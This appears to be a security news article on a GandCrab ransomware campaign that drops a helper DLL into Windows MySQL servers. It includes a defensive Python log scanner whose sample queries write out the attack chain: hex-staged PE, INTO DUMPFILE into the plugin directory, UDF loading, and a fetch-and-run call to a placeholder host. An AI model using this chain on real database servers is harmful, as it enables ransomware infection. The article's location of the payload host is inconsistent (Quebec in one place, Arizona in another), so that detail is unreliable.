New GandCrab Ransomware Campaign Targets MySQL Servers on Windows

Security researchers have discovered a new GandCrab ransomware campaign targeting internet-facing MySQL servers running on Windows.

The campaign was spotted by researchers at Sophos Labs.

“A honeypot we run in a lab environment, listening on the default port used for SQL servers (3306/tcp), received an intriguing attack this week from a machine based in the United States.”

Analysing the traffic captured by the honeypot, the researchers found that the honeypot had been made to download a Windows executable file.

The attacker begins the infection by uploading a small helper DLL to the server using ordinary SQL database commands.

The DLL is then invoked to download the GandCrab ransomware payload from a server hosted on an IP address in Quebec, Canada.

Database server downloading GandCrab. Source: Sophos Labs

In the first stage, the attacker connects to the database server running MySQL and uses a SET statement to store the helper DLL, encoded as a string of hexadecimal characters, in a user variable held in memory.

Next, the attacker issues a command that writes the bytes held in that variable out as a single file, dropping it into the server's plugin directory (the directory from which MySQL loads user-defined function libraries, so a DLL placed there can be loaded and called from SQL).

Sequence of network events 

In the final step, the database server downloads the GandCrab ransomware payload from a remote server, saves it to the root of the C: drive under the name isetup.exe, and executes it.

The researchers also observed the attacker issuing several commands that swap forward-slash and backslash characters in the file paths, apparently to evade simple pattern-based detection.

The researchers spotted the attack on May 19th and noted that, had the payload executed successfully, it would have encrypted all the files on the affected system.
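The three stages described above (hex blob staged in a user variable, bytes written into the plugin directory, DLL loaded and called) leave a recognisable trail in a MySQL query log, and the slash-swapping trick defeats only detectors that match on the raw path. The following Python script is an added example written for this article, not code from Sophos or from the Sophos report: it scans a small, constructed set of log lines (not real attacker traffic) for that chain, normalising path separators before matching. The DLL name helper.dll, the UDF name fetch_and_run, and the IP 203.0.113.5 are placeholders, and the CREATE FUNCTION ... SONAME statement is the standard MySQL mechanism for loading a user-defined function library, which the article does not spell out.

```python
import re

# Constructed sample of MySQL query-log statements for this example; NOT taken
# from the Sophos report. Real general-log lines carry a timestamp and thread id
# prefix, stripped here to keep the focus on the statements themselves.
SAMPLE_QUERIES = [
    "SELECT * FROM orders WHERE id = 42",
    # Stage 1: a PE image (starts with 'MZ' = 0x4D5A) staged as hex in a user variable,
    # typically across several SET / CONCAT statements
    "SET @p = 0x4D5A90000300000004000000FFFF0000B8000000000000004000000000000000",
    "SET @p = CONCAT(@p, 0x0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D)",
    # Stage 2: the bytes written out as a file in the plugin directory; the mix of
    # '/' and '\' separators is the evasion the researchers observed
    "SELECT @p INTO DUMPFILE 'C:\\Program Files/MySQL\\MySQL Server 5.7/lib\\plugin/helper.dll'",
    # Stage 3: the DLL loaded as a user-defined function and called (hypothetical names)
    "CREATE FUNCTION fetch_and_run RETURNS INTEGER SONAME 'helper.dll'",
    "SELECT fetch_and_run('http://203.0.113.5/isetup.exe', 'C:/isetup.exe')",
]

# SET @var = 0x..., SET @var := X'...', or SET @var = CONCAT(@var, 0x...) with a long blob
HEX_STAGE = re.compile(
    r"\bSET\s+@\w+\s*:?=\s*(?:CONCAT\(\s*@\w+\s*,\s*)?(?:0x|x')([0-9a-f]{32,})", re.I)
# SELECT ... INTO DUMPFILE / OUTFILE '<path>'
FILE_WRITE = re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\s+'([^']+)'", re.I)
# CREATE FUNCTION <name> RETURNS <type> SONAME '<library>'
UDF_LOAD = re.compile(
    r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)

CHAIN = ["stage-payload", "write-plugin", "load-udf"]


def normalize_path(path):
    """Fold '\\' into '/', collapse repeats and lower-case, so slash-swapping
    does not hide the plugin directory from the match below."""
    p = path.replace("\\", "/")
    while "//" in p:
        p = p.replace("//", "/")
    return p.lower()


def scan_query(query):
    """Return a list of (rule, detail) findings for one statement."""
    findings = []
    m = HEX_STAGE.search(query)
    if m:
        detail = "hex blob staged in user variable"
        if m.group(1)[:4].upper() == "4D5A":
            detail += " (starts with MZ: PE image)"
        findings.append(("stage-payload", detail))
    m = FILE_WRITE.search(query)
    if m:
        path = normalize_path(m.group(1))
        if "/plugin/" in path or path.endswith(".dll"):
            findings.append(("write-plugin", "file written to plugin dir: " + path))
        else:
            findings.append(("write-file", "file written via INTO DUMPFILE/OUTFILE: " + path))
    m = UDF_LOAD.search(query)
    if m:
        findings.append(("load-udf", "UDF %s loaded from %s" % (m.group(1), m.group(2))))
    return findings


def scan_session(queries):
    """Scan a sequence of statements from one session; return (verdict, report).
    The verdict is 'udf-dropper chain' only when all three stages appear."""
    report = []
    stages_seen = set()
    for index, query in enumerate(queries):
        for rule, detail in scan_query(query):
            report.append((index, rule, detail))
            stages_seen.add(rule)
    if all(stage in stages_seen for stage in CHAIN):
        verdict = "udf-dropper chain"
    elif stages_seen:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, report


if __name__ == "__main__":
    verdict, report = scan_session(SAMPLE_QUERIES)
    print("verdict:", verdict)
    for index, rule, detail in report:
        print("  [%d] %-14s %s" % (index, rule, detail))
```

Two points worth keeping in mind when using this against a real server. First, every stage here requires privileges the attacker must already hold: INTO DUMPFILE needs the FILE privilege, and CREATE FUNCTION ... SONAME needs write access to the mysql.func table plus a library that already sits in plugin_dir, so an application account without FILE, a secure_file_priv setting that excludes the plugin directory, and a mysqld service account that is not a local administrator each break the chain independently of detection. Second, the general log is off by default and costly; the same rules can be run over audit-plugin output or over captured port 3306 traffic, which is where the Sophos honeypot saw them.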

“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”

For more details on the attack and the associated IoCs, see the Sophos Labs report.

